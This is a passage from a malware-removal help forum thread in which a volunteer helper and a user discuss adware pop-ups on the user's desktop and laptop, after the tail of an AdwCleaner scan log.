C:\AdwCleaner\AdwCleaner[C2].txt - [4251 Bytes] - [03/05/2017 16:22:35]
C:\AdwCleaner\AdwCleaner[S1].txt - [6263 Bytes] - [19/04/2016 02:58:24]
C:\AdwCleaner\AdwCleaner[S2].txt - [4542 Bytes] - [03/05/2017 16:20:37]

########## EOF - C:\AdwCleaner\AdwCleaner[C2].txt - [4470 Bytes] ##########
 



#10 fireman4it

fireman4it

    Bleepin' Fireman


  • Malware Response Team
  • 13,505 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Greenup, Ill USA
  • Local time:09:01 PM

Posted 03 May 2017 - 01:50 PM

How is your computer running now?


" Extinguishing Malware from the world"

The Virus, Trojan, Spyware, and Malware Removal forum is very busy. If I'm helping you and I've not posted back within 24 hrs., send a PM with your topic link. Thank you.

ALL OTHER HELP REQUESTS VIA THE PM SYSTEM WILL BE IGNORED. The Forums are there for a reason!
Thanks-


  userbar_eis_500.gif

If I have helped you, consider making a donation to help me continue the fight against Malware! Just click btn_donate_LG.gif


#11 palaboyako

palaboyako
  • Topic Starter

  • Members
  • 13 posts
  • OFFLINE
  •  
  • Local time:10:01 AM

Posted 17 May 2017 - 02:59 AM

my desktop is performing better and i'm not able to see anymore unwanted processes or software being installed.

 

my laptop though is having the same thing. i'm trying to follow the instructions except for the frst as i don't have the logs to use.

 

let me know if i need to start a new thread...


Edited by palaboyako, 17 May 2017 - 03:35 AM.


#12 palaboyako

palaboyako
  • Topic Starter

  • Members
  • 13 posts
  • OFFLINE
  •  
  • Local time:10:01 AM

Posted 17 May 2017 - 05:44 AM

I'm getting a lot of unwanted pop up. New pages I will never go to...

b-inspiration-prosperity-men something is the pop up.

 

Please see attached logs...

Attached Files


Edited by palaboyako, 17 May 2017 - 06:15 AM.


#13 fireman4it

fireman4it

    Bleepin' Fireman


  • Malware Response Team
  • 13,505 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Greenup, Ill USA
  • Local time:09:01 PM

Posted 19 May 2017 - 11:37 AM

is this from the Desktop or Laptop?


" Extinguishing Malware from the world"

The Virus, Trojan, Spyware, and Malware Removal forum is very busy. If I'm helping you and I've not posted back within 24 hrs., send a PM with your topic link. Thank you.

ALL OTHER HELP REQUESTS VIA THE PM SYSTEM WILL BE IGNORED. The Forums are there for a reason!
Thanks-


  userbar_eis_500.gif

If I have helped you, consider making a donation to help me continue the fight against Malware! Just click btn_donate_LG.gif





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users